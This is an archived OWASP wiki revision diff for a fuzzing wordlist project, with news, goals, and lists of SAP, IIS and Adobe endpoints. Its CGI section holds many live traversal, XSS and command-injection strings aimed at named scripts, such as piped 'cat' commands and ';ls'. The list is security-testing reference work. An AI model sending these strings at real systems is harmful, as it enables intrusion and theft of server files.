This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org

Difference between revisions of "Category:OWASP Fuzzing Code Database"

From OWASP
Jump to: navigation, search
(Added Format Strings)
m (Updated my contact information - I don't use [email protected] anymore)
 
(85 intermediate revisions by 7 users not shown)
Line 1: Line 1:
This database is a collection of several statements used in code injection software. All to often security professionals use their own repositories of statements collected from several projects for a long time. We want to collect all these statements - compose them - merging the database of several projects like [[WebScarab]] and [[JBroFuzz]] gaining a big dataset of effective statements to provide better testing results.
+
{|
Please add your own statements and check the statements already added.
+
|-
 +
! width="700" align="center" | <br>
 +
! width="500" align="center" | <br>
 +
|-
 +
| align="right" | [[Image:OWASP Inactive Banner.jpg|800px| link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Inactive_Projects]]  
 +
| align="right" |
  
=== SQL Injection Statements ===
+
|}
 +
This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added.
  
 +
==== News  ====
 +
 +
'''10 November 2011'''
 +
 +
*Update Category: SAP Common URL Web Interfaces (10 November 2011 - Total Statements: 155)
 +
 +
'''08 November 2010'''
 +
 +
*Created new Category: Adobe XML Files (08 November 2010 - Total Statements: 16)
 +
 +
'''15 September 2010'''
 +
 +
*Created new Category: SAP Common URL Web Interfaces (15 September 2010 - Total Statements: 6)
 +
 +
'''17 March 2010'''
 +
 +
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)
 +
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)
 +
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)
 +
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)
 +
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)
 +
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)
 +
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)
 +
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)
 +
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)
 +
 +
'''16 March 2010'''
 +
 +
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)
 +
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284)
 +
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)
 +
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)
 +
 +
 +
'''02 February 2010'''
 +
 +
*Created new Category Lotus/Notes Files
 +
 +
'''11 August 2009'''
 +
 +
*Created new Category: XML Attacks
 +
 +
''Update Statements''
 +
 +
*15 new XML Statements
 +
*93 new SQL Injections Statements
 +
*67 new Traversal Directory Statements
 +
*Delete 33 XSS Statement Duplicate
 +
*30 New XSS Statements
 +
 +
'''7 August 2009'''
 +
 +
*Updated the objectives of the project.
 +
 +
'''21 July 2009'''
 +
 +
*Set the team responsible for the project.
 +
 +
==== Goals  ====
 +
 +
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP.
 +
 +
In addition, the following functionalities will be included on this project:
 +
 +
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases
 +
 +
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned:
 +
 +
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database.
 +
 +
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation.
 +
 +
3 - Possibility to support users on the report of their own experiences with the statements.
 +
 +
==== Statements  ====
 +
 +
=== Adobe XML Files (08 November 2010) ===
 +
<pre>
 +
/flex2gateway/
 +
/flex2gateway/http
 +
/flex2gateway/httpsecure
 +
/flex2gateway/cfamfpoolling
 +
/flex2gateway/amf
 +
/flex2gateway/amfpolling
 +
/messagebroker/http
 +
/messagebroker/httpsecure
 +
/blazeds/messagebroker/http
 +
/blazeds/messagebroker/httpsecure
 +
/samples/messagebroker/http
 +
/samples/messagebroker/httpsecure
 +
/lcds/messagebroker/http
 +
/lcds/messagebroker/httpsecure
 +
/lcds-samples/messagebroker/http
 +
/lcds-samples/messagebroker/httpsecure
 +
</pre>
 +
 +
=== SAP Commom URL Web Interface (10 November 2011) ===
 +
<pre>
 +
/rep/build_info.html
 +
/rep/build_info.jsp
 +
/run/build_info.html
 +
/run/build_info.jsp
 +
/rwb/version.html
 +
/sap/bc/bsp/esh_os_service/favicon.gif
 +
/sap/bc/bsp/sap
 +
/sap/bc/bsp/sap/alertinbox
 +
/sap/bc/bsp/sap/bsp_dlc_frcmp
 +
/sap/bc/bsp/sap/bsp_veri
 +
/sap/bc/bsp/sap/bsp_verificatio
 +
/sap/bc/bsp/sap/bsp_wd_base
 +
/sap/bc/bsp/sap/bspwd_basics
 +
/sap/bc/bsp/sap/certmap
 +
/sap/bc/bsp/sap/certreq
 +
/sap/bc/bsp/sap/crm_bsp_frame
 +
/sap/bc/bsp/sap/crmcmp_bpident/
 +
/sap/bc/bsp/sap/crmcmp_brfcase
 +
/sap/bc/bsp/sap/crmcmp_hdr
 +
/sap/bc/bsp/sap/crmcmp_hdr_std
 +
/sap/bc/bsp/sap/crmcmp_ic_frame
 +
/sap/bc/bsp/sap/crm_thtmlb_util
 +
/sap/bc/bsp/sap/crm_ui_frame
 +
/sap/bc/bsp/sap/crm_ui_start
 +
/sap/bc/bsp/sap/esh_sap_link
 +
/sap/bc/bsp/sap/esh_sapgui_exe
 +
/sap/bc/bsp/sap/graph_bsp_test
 +
/sap/bc/bsp/sap/graph_bsp_test/Mimes
 +
/sap/bc/bsp/sap/gsbirp
 +
/sap/bc/bsp/sap/htmlb_samples
 +
/sap/bc/bsp/sap/iccmp_bp_cnfirm
 +
/sap/bc/bsp/sap/iccmp_hdr_cntnr
 +
/sap/bc/bsp/sap/iccmp_hdr_cntnt
 +
/sap/bc/bsp/sap/iccmp_header
 +
/sap/bc/bsp/sap/iccmp_ssc_ll/
 +
/sap/bc/bsp/sap/ic_frw_notify
 +
/sap/bc/bsp/sap/it00
 +
/sap/bc/bsp/sap/public/bc
 +
/sap/bc/bsp/sap/public/graphics
 +
/sap/bc/bsp/sap/sam_demo
 +
/sap/bc/bsp/sap/sam_notifying
 +
/sap/bc/bsp/sap/sam_sess_queue
 +
/sap/bc/bsp/sap/sbspext_htmlb
 +
/sap/bc/bsp/sap/sbspext_xhtmlb
 +
/sap/bc/bsp/sap/spi_admin
 +
/sap/bc/bsp/sap/spi_monitor
 +
/sap/bc/bsp/sap/sxms_alertrules
 +
/sap/bc/bsp/sap/system
 +
/sap/bc/bsp/sap/thtmlb_scripts
 +
/sap/bc/bsp/sap/thtmlb_styles
 +
/sap/bc/bsp/sap/uicmp_ltx
 +
/sap/bc/bsp/sap/xmb_bsp_log
 +
/sap/bc/contentserver
 +
/sap/bc/echo
 +
/sap/bc/error
 +
/sap/bc/FormToRfc
 +
/sap/bc/graphics/net
 +
/sap/bc/gui/sap/its/CERTREQ
 +
/sap/bc/gui/sap/its/designs
 +
/sap/bc/gui/sap/its/webgui
 +
/sap/bc/IDoc_XML
 +
/sap/bc/ping
 +
/sap/bc/report
 +
/sap/bc/soap/ici
 +
/sap/bc/soap/rfc
 +
/sap/bc/srt/IDoc
 +
/sap/bc/wdvd
 +
/sap/bc/webdynpro/sap/apb_launchpad
 +
/sap/bc/webdynpro/sap/apb_launchpad_nwbc
 +
/sap/bc/webdynpro/sap/apb_lpd_light_start
 +
/sap/bc/webdynpro/sap/apb_lpd_start_url
 +
/sap/bc/webdynpro/sap/application_exit
 +
/sap/bc/webdynpro/sap/appl_log_trc_viewer
 +
/sap/bc/webdynpro/sap/appl_soap_management
 +
/sap/bc/webdynpro/sap/ccmsbi_wast_extr_testenv
 +
/sap/bc/webdynpro/sap/cnp_light_test
 +
/sap/bc/webdynpro/sap/configure_application
 +
/sap/bc/webdynpro/sap/configure_component
 +
/sap/bc/webdynpro/sap/esh_search_results.ui
 +
/sap/bc/webdynpro/sap/esh_adm_smoketest_ui
 +
/sap/bc/webdynpro/sap/sh_adm_smoketest_files
 +
/sap/bc/webdynpro/sap/esh_eng_modelling
 +
/sap/bc/webdynpro/sap/esh_admin_ui_component
 +
/sap/bc/webdynpro/sap/wdhc_application
 +
/sap/bc/webdynpro/sap/wd_analyze_config_appl
 +
/sap/bc/webdynpro/sap/wd_analyze_config_comp
 +
/sap/bc/webdynpro/sap/wd_analyze_config_user
 +
/sap/bc/webdynpro/sap/WDR_TEST_ADOBE
 +
/sap/bc/webdynpro/sap/WDR_TEST_EVENTS
 +
/sap/bc/webdynpro/sap/wdr_test_popups_rt
 +
/sap/bc/webdynpro/sap/WDR_TEST_TABLE
 +
/sap/bc/webdynpro/sap/wdr_test_ui_elements
 +
/sap/bc/webdynpro/sap/WDR_TEST_WINDOW_ERROR
 +
/sap/bc/webrfc
 +
/sap/bc/xrfc
 +
/sap/bc/xrfc_test
 +
/sap/es/cockpit
 +
/sap/es/getdocument
 +
/sap/es/opensearch
 +
/sap/es/opensearch/description
 +
/sap/es/opensearch/list
 +
/sap/es/opensearch/search
 +
/sap/es/saplink
 +
/sap/es/search
 +
/sap/es/redirect
 +
/sap/crm
 +
/sap/public/bc
 +
/sap/public/bc/icons
 +
/sap/public/bc/icons_rtl
 +
/sap/public/bc/its/mimes
 +
/sap/public/bc/its/mimes/system/SL/page/hourglass.html
 +
/sap/public/bc/its/mobile/itsmobile00
 +
/sap/public/bc/its/mobile/itsmobile01
 +
/sap/public/bc/its/mobile/rfid
 +
/sap/public/bc/its/mobile/start
 +
/sap/public/bc/its/mobile/test
 +
/sap/public/bc/NWDEMO_MODEL
 +
/sap/public/bc/NW_ESH_TST_AUTO
 +
/sap/public/bc/pictograms
 +
/sap/public/bc/sicf_login_run
 +
/sap/public/bc/trex
 +
/sap/public/bc/ur
 +
/sap/public/bc/wdtracetool
 +
/sap/public/bc/webdynpro/adobechallenge
 +
/sap/public/bc/webdynpro/mimes
 +
/sap/public/bc/webdynpro/ssr
 +
/sap/public/bc/webdynpro/viewdesigner
 +
/sap/public/bc/webicons
 +
/sap/public/bc/workflow
 +
/sap/public/bc/workflow/shortcut
 +
/sap/public/bsp/sap
 +
/sap/public/bsp/sap/htmlb
 +
/sap/public/bsp/sap/public
 +
/sap/public/bsp/sap/public/bc
 +
/sap/public/bsp/sap/public/faa
 +
/sap/public/bsp/sap/public/graphics
 +
/sap/public/bsp/sap/public/graphics/jnet_handler
 +
/sap/public/bsp/sap/public/graphics/mimes
 +
/sap/public/bsp/sap/system
 +
/sap/public/bsp/sap/system_public
 +
/sap/public/icf_check
 +
/sap/public/icf_info
 +
/sap/public/icf_info/icr_groups
 +
/sap/public/icf_info/icr_urlprefix
 +
/sap/public/icf_info/logon_groups
 +
/sap/public/icf_info/urlprefix
 +
/sap/public/icman
 +
/sap/public/info
 +
/sap/public/myssocntl
 +
/sap/public/ping
 +
/sap/webcuif
 +
/sap/public/icman/ping
 +
/sap/admin
 +
/sap/wdisp/admin
 +
/scripts/wgate
 +
</pre>
 +
 +
=== Microsoft URLs (8 April 2010) ===
 +
<pre># Interesting IIS Files & Directories (8 April 2010)
 +
 +
# creative commons
 +
# Look at the result codes in the headers - 403 likely mean the dir exists, 404  means not. It takes an ISAPI filter for IIS to return 404's for 403s.
 +
# Altetrnatively, slight differences in the number of bytes returned will help differentiate.
 +
 +
/.printer
 +
/%NETHOOD%/
 +
/<script>alert('XSS')</script>.aspx
 +
/AccessPlatform/
 +
/AccessPlatform/auth/
 +
/AccessPlatform/auth/clientscripts/cookies.js
 +
/AccessPlatform/auth/clientscripts/login.js
 +
/Exadmin/
 +
/ExchWeb/
 +
/Exchange/
 +
/Microsoft-Server-ActiveSync/
 +
/OMA/
 +
/OWA/
 +
/Public/
 +
/_layouts/alllibs.htm
 +
/_layouts/settings.htm
 +
/_layouts/userinfo.htm
 +
/_vti_bin/
 +
/_vti_bin/_vti_aut/fp30reg.dll
 +
/_vti_pvt/
 +
/_WEB_INF/
 +
/a%5c.aspx
 +
/adovbs.inc
 +
/aspnet_files/
 +
/certcontrol/
 +
/certenroll/
 +
/certsrv/
 +
/citrix/
 +
/citrix/AccessPlatform/auth/
 +
/citrix/AccessPlatform/auth/clientscripts/
 +
/AccessPlatform/auth/clientscripts/
 +
/Citrix//AccessPlatform/auth/clientscripts/cookies.js
 +
/Citrix/AccessPlatform/auth/clientscripts/login.js
 +
/Citrix/PNAgent/config.xml
 +
/exchange/root.asp
 +
/forum.asp
 +
/forum_arc.asp
 +
/forum_professionnel.asp
 +
/iisadmin/
 +
/iisadmpwd/achg.htr
 +
/iisadmpwd/aexp.htr
 +
/iisadmpwd/aexp2.htr
 +
/iisadmpwd/aexp2b.htr
 +
/iisadmpwd/aexp3.htr
 +
/iisadmpwd/aexp4.htr
 +
/iisadmpwd/aexp4b.htr
 +
/iisadmpwd/anot.htr
 +
/iisadmpwd/anot3.htr
 +
/iiasdmpwd/
 +
/iishelp/
 +
/iishelp/iis/misc/default.asp
 +
/iissamples/
 +
/imprimer.asp
 +
/includes/adovbs.inc
 +
/msadc/
 +
/null.htw
 +
/pbserver/pbserver.dll
 +
/postinfo.html
 +
/rubrique.asp
 +
/scripts/
 +
/scripts/fpcount.exe
 +
/scripts/cgimail.exe
 +
/scripts/tools/newdsn.exe
 +
/scripts/tools/getdrvs.exe
 +
/scripts/convert.bas
 +
/cgi-bin/htmlscript
 +
/scripts/counter.exe
 +
/scripts/no-such-file.pl
 +
/share/
 +
/tsweb/
 +
/~/<script>alert('XSS')</script>.asp
 +
/~/<script>alert('XSS')</script>.aspx
 +
/index.shtml
 +
/x.htw
 +
/x.ida
 +
/x.idq
 +
/cgi
 +
/scripts/iisadmin/ism.dll?http/dir
 +
/scripts/samples/search/webhits.exe
 +
</pre>
 +
 +
=== Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563) ===
 +
<pre># Vulnerable Cross-Platform CGI (17 March 2010)
 +
# fuzz inside cgi directories
 +
# on windows, this is usually /scripts or /bin or /cgi-bin, on unix, usually /cgi-bin, /nph-cgi
 +
 +
 +
%2e%2e/abyss.conf
 +
.access
 +
.cobalt
 +
.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('XSS')>
 +
.cobalt/alert/service.cgi?service=<script>alert('XSS')</script>
 +
.fhp
 +
.htaccess
 +
.htaccess.old
 +
.htaccess.save
 +
.htaccess~
 +
.htpasswd
 +
.nsconfig
 +
.passwd
 +
.www_acl
 +
.wwwacl
 +
/_vti_pvt/doctodep.btr
 +
14all-1.1.cgi?cfg=../../../../../../../..{KNOWNFILE}
 +
14all.cgi?cfg=../../../../../../../..{KNOWNFILE}
 +
AT-admin.cgi
 +
AT-generate.cgi
 +
Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
 +
AnyBoard.cgi
 +
AnyForm
 +
AnyForm2
 +
Backup/add-passwd.cgi
 +
C
 +
Count.cgi
 +
DC
 +
DCFORM
 +
File
 +
FormHandler.cgi?realname=aaa&email=aaa&reply_message_template=%2Fetc%2Fpasswd&reply_message_from=sq%40example.com&redirect=http%3A%2F%2Fwww.example.com&recipient=sq%40example.com
 +
FormMail.cgi?<script>alert(\
 +
FormMail.pl
 +
ImageFolio/admin/admin.cgi
 +
LWGate
 +
LWGate.cgi
 +
Upload.pl
 +
Vs
 +
W
 +
YaBB.pl?board=news&action=display&num=../../../../../../../../../..{KNOWNFILE}%00
 +
YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('XSS')</script>
 +
a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}
 +
a1stats/a1disp3.cgi?../../../../../../../../../..{KNOWNFILE}
 +
a1stats/a1disp3.cgi?../../../../../../..{KNOWNFILE}
 +
a1stats/a1disp4.cgi?../../../../../../..{KNOWNFILE}
 +
add_ftp.cgi
 +
addbanner.cgi
 +
adduser.cgi
 +
admin.cgi
 +
admin.cgi?list=../../../../../../../../../..{KNOWNFILE}
 +
admin.php
 +
admin.php3
 +
admin.pl
 +
adminhot.cgi
 +
adminwww.cgi
 +
af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
 +
aglimpse
 +
aglimpse.cgi
 +
alibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,
 +
alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
 +
amadmin.pl
 +
anacondaclip.pl?template=../../../../../../../../../..{KNOWNFILE}
 +
ans.pl?p=../../../../../usr/bin/id|&blah
 +
ans/ans.pl?p=../../../../../usr/bin/id|&blah
 +
anyboard.cgi
 +
archie
 +
architext_query.cgi
 +
architext_query.pl
 +
ash
 +
astrocam.cgi
 +
atk/javascript/class.atkdateattribute.js.php?config_atkroot=@RFIURL
 +
auction/auction.cgi?action=
 +
auctiondeluxe/auction.pl
 +
auktion.cgi?menue=../../../../../../../../../..{KNOWNFILE}
 +
auth_data/auth_user_file.txt
 +
awl/auctionweaver.pl
 +
awstats.pl
 +
awstats/awstats.pl
 +
ax-admin.cgi
 +
ax.cgi
 +
axs.cgi
 +
badmin.cgi
 +
banner.cgi
 +
bannereditor.cgi
 +
bash
 +
bb-hist?HI
 +
bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
 +
bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
 +
bbs_forum.cgi
 +
betsie/parserl.pl/<script>alert('XSS')</script>;
 +
bigconf.cgi?command=view_textfile&file={KNOWNFILE}&filters=
 +
bizdb1-search.cgi
 +
blog/
 +
blog/mt-check.cgi
 +
blog/mt-load.cgi
 +
blog/mt.cfg
 +
bnbform
 +
bnbform.cgi
 +
book.cgi?action=default&current=|cat%20{KNOWNFILE}|&form_tid=996604045&prev=main.html&list_message_index=10
 +
boozt/admin/index.cgi?section=5&input=1
 +
bsguest.cgi?email=x;ls
 +
bslist.cgi?email=x;ls
 +
build.cgi
 +
bulk/bulk.cgi
 +
c_download.cgi
 +
cached_feed.cgi
 +
cachemgr.cgi
 +
cal_make.pl?p0=../../../../../../../../../..{KNOWNFILE}%00
 +
calendar
 +
calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22
 +
calendar.pl
 +
calendar/calendar_admin.pl?config=|cat%20{KNOWNFILE}|
 +
calendar/index.cgi
 +
calendar_admin.pl?config=|cat%20{KNOWNFILE}|
 +
calender_admin.pl
 +
campas?%0acat%0a{KNOWNFILE}%0a
 +
cart.pl
 +
cart.pl?db='
 +
cartmanager.cgi
 +
cbmc/forums.cgi
 +
ccbill-local.cgi?cmd=MENU
 +
ccbill-local.pl?cmd=MENU
 +
cgforum.cgi
 +
cgi-lib.pl
 +
cgicso?query=<script>alert('XSS')</script>
 +
cgicso?query=AAA
 +
cgiforum.pl?thesection=../../../../../../../../../..{KNOWNFILE}%00
 +
cgiwrap
 +
cgiwrap/%3Cfont%20color=red%3E
 +
cgiwrap/~@U
 +
cgiwrap/~JUNK(5)
 +
cgiwrap/~root
 +
change-your-password.pl
 +
classified.cgi
 +
classifieds
 +
classifieds.cgi
 +
classifieds/classifieds.cgi
 +
classifieds/index.cgi
 +
clickcount.pl?view=test
 +
clickresponder.pl
 +
code.php
 +
code.php3
 +
com5..........................................................................................................................................................................................................................box
 +
com5.java
 +
com5.pl
 +
commandit.cgi
 +
commerce.cgi?page=../../../../../../../../../..{KNOWNFILE}%00index.html
 +
common.php?f=0&ForumLang=../../../../../../../../../..{KNOWNFILE}
 +
common/listrec.pl
 +
common/listrec.pl?APP=qmh-news&TEMPLATE=;ls%20/etc|
 +
compatible.cgi
 +
count.cgi
 +
counter-ord
 +
counterbanner
 +
counterbanner-ord
 +
counterfiglet-ord
 +
counterfiglet/nc/
 +
cs
 +
csChatRBox.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')
 +
csGuestBook.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')
 +
csLive
 +
csNews.cgi
 +
csNewsPro.cgi?command=savesetup&setup=;system('cat%20{KNOWNFILE}')
 +
csPassword.cgi
 +
csPassword/csPassword.cgi
 +
csh
 +
cstat.pl
 +
cutecast/members/
 +
cvsblame.cgi?file=<script>alert('XSS')</script>
 +
cvslog.cgi?file=*&rev=&root=<script>alert('XSS')</script>
 +
cvslog.cgi?file=<script>alert('XSS')</script>
 +
cvsquery.cgi?branch=<script>alert('XSS')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>
 +
cvsquery.cgi?module=<script>alert('XSS')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week
 +
cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('XSS')</script>&branch=HEAD
 +
dansguardian.pl?DENIEDURL=</a><script>alert('XSS');</script>
 +
dasp/fm_shell.asp
 +
data/fetch.php?page=
 +
date
 +
day5datacopier.cgi
 +
day5datanotifier.cgi
 +
db2www/library/document.d2w/show
 +
db4web_c/dbdirname/{KNOWNFILE}
 +
db_manager.cgi
 +
dbman/db.cgi?db=no-db
 +
dcforum.cgi?az=list&forum=../../../../../../../../../..{KNOWNFILE}%00
 +
dcshop/auth_data/auth_user_file.txt
 +
dcshop/orders/orders.txt
 +
dfire.cgi
 +
diagnose.cgi
 +
dig.cgi
 +
directorypro.cgi?want=showcat&show=../../../../../../../../../..{KNOWNFILE}%00
 +
displayTC.pl
 +
dnewsweb
 +
donothing
 +
dose.pl?daily&somefile.txt&|ls|
 +
download.cgi
 +
dumpenv.pl
 +
edit.pl
 +
empower?DB=whateverwhatever
 +
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
 +
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
 +
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
 +
enter.cgi
 +
environ.cgi
 +
environ.pl
 +
environ.pl?param1=<script>alert(document.cookie)</script>
 +
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E
 +
eshop.pl/seite=;cat%20eshop.pl|
 +
ex-logger.pl
 +
excite
 +
excite;IF
 +
ezadmin.cgi
 +
ezboard.cgi
 +
ezman.cgi
 +
ezshopper/loadpage.cgi?user_id=1&file=|cat%20{KNOWNFILE}|
 +
ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../..{KNOWNFILE}&distinct=1
 +
ezshopper2/loadpage.cgi
 +
ezshopper3/loadpage.cgi
 +
faqmanager.cgi?toc={KNOWNFILE}%00
 +
faxsurvey?cat%20{KNOWNFILE}
 +
filemail
 +
filemail.pl
 +
finger
 +
finger.pl
 +
flexform
 +
flexform.cgi
 +
fom.cgi?file=<script>alert('XSS')</script>
 +
fom/fom.cgi?cmd=<script>alert('XSS')</script>&file=1&keywords=vulnerable
 +
formmail
 +
formmail.cgi
 +
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test
 +
formmail.pl
 +
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test
 +
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&email=joeuser@localhost&subject=test
 +
fortune
 +
ftp.pl
 +
ftpsh
 +
gH.cgi
 +
gbadmin.cgi?action=change_adminpass
 +
gbadmin.cgi?action=change_automail
 +
gbadmin.cgi?action=colors
 +
gbadmin.cgi?action=setup
 +
gbook/gbook.cgi?_MAILTO=xx;ls
 +
gbpass.pl
 +
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1
 +
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1
 +
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1
 +
getdoc.cgi
 +
gettransbitmap
 +
glimpse
 +
gm-authors.cgi
 +
gm-cplog.cgi
 +
gm.cgi
 +
guestbook.cgi
 +
guestbook.cgi?user=cpanel&template=|/bin/cat%20{KNOWNFILE}|
 +
guestbook.pl
 +
guestbook/passwd
 +
handler.cgi
 +
hitview.cgi
 +
horde/test.php
 +
horde/test.php?mode=phpinfo
 +
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00
 +
htgrep?file=index.html&hdr={KNOWNFILE}
 +
html2chtml.cgi
 +
html2wml.cgi
 +
htmlscript?../../../../../../../../../..{KNOWNFILE}
 +
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E
 +
htsearch?-c/nonexistant
 +
htsearch?config=foofighter&restrict=&exclude=&method=and&format=builtin-long&sort=score&words=
 +
htsearch?exclude=%60{KNOWNFILE}%60
 +
ibill.pm
 +
icat
 +
if/admin/nph-build.cgi
 +
ikonboard/help.cgi?
 +
imageFolio.cgi
 +
imagefolio/admin/admin.cgi
 +
imagemap
 +
include/new-visitor.inc.php
 +
index.js0x70
 +
index.pl
 +
info2www
 +
info2www '(../../../../../../../bin/mail root <{KNOWNFILE}>
 +
infosrch.cgi
 +
ion-p?page=../../../../..{KNOWNFILE}
 +
jailshell
 +
jj
 +
journal.cgi?folder=journal.cgi%00
 +
ksh
 +
lastlines.cgi?process
 +
listrec.pl
 +
loadpage.cgi?user_id=1&file=../../../../../../../../../..{KNOWNFILE}
 +
loadpage.cgi?user_id=1&file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
 +
log-reader.cgi
 +
log/
 +
log/nether-log.pl?checkit
 +
login.cgi
 +
login.pl
 +
login.pl?course_id=\
 +
logit.cgi
 +
logs.pl
 +
logs/
 +
logs/access_log
 +
logs/error_log
 +
lookwho.cgi
 +
ls
 +
lwgate
 +
lwgate.cgi
 +
magiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../..{KNOWNFILE}
 +
mail
 +
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
 +
mail/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../..{KNOWNFILE}%00
 +
mailit.pl
 +
maillist.cgi
 +
maillist.pl
 +
mailnews.cgi
 +
main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../..{KNOWNFILE}
 +
majordomo.pl
 +
man2html
 +
mastergate/search.cgi?search=0&search_on=all
 +
meta.pl
 +
mgrqcgi
 +
mini_logger.cgi
 +
mmstdod.cgi
 +
moin.cgi?test
 +
mojo/mojo.cgi
 +
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}
 +
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}
 +
mrtg.cgi?cfg=blah
 +
ms_proxy_auth_query/
 +
mt-static/
 +
mt-static/mt-check.cgi
 +
mt-static/mt-load.cgi
 +
mt-static/mt.cfg
 +
mt/
 +
mt/mt-check.cgi
 +
mt/mt-load.cgi
 +
mt/mt.cfg
 +
multihtml.pl?multi={KNOWNFILE}%00html
 +
musicqueue.cgi
 +
myguestbook.cgi?action=view
 +
namazu.cgi
 +
nbmember.cgi?cmd=list_all_users
 +
netauth.cgi?cmd=show&page=../../../../../../../../../..{KNOWNFILE}
 +
netpad.cgi
 +
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}
 +
nimages.php
 +
nlog-smb.cgi
 +
nlog-smb.pl
 +
non-existent.pl
 +
noshell
 +
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00
 +
nph-error.pl
 +
nph-exploitscanget.cgi
 +
nph-maillist.pl
 +
nph-publish
 +
nph-publish.cgi
 +
nph-showlogs.pl?files=../../&filter=.*&submit=Go&linecnt=500&refresh=0
 +
nph-test-cgi
 +
ntitar.pl
 +
opendir.php?{KNOWNFILE}
 +
orders/orders.txt
 +
pagelog.cgi
 +
pals-cgi?palsAction=restart&documentName={KNOWNFILE}
 +
parse-file
 +
pass
 +
passwd
 +
passwd.txt
 +
password
 +
pbcgi.cgi?name=Joe%Camel&email=%3C
 +
perl
 +
perl?-v
 +
perlshop.cgi
 +
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'
 +
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}
 +
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'
 +
phf
 +
phf.cgi?QALIA
 +
phf?Qname=root%0Acat%20{KNOWNFILE}%20
 +
photo/
 +
photo/manage.cgi
 +
photo/protected/manage.cgi
 +
php-cgi
 +
php.cgi?{KNOWNFILE}
 +
plusmail
 +
pollit/Poll_It_
 +
pollssi.cgi
 +
post-query
 +
post_query
 +
postcards.cgi
 +
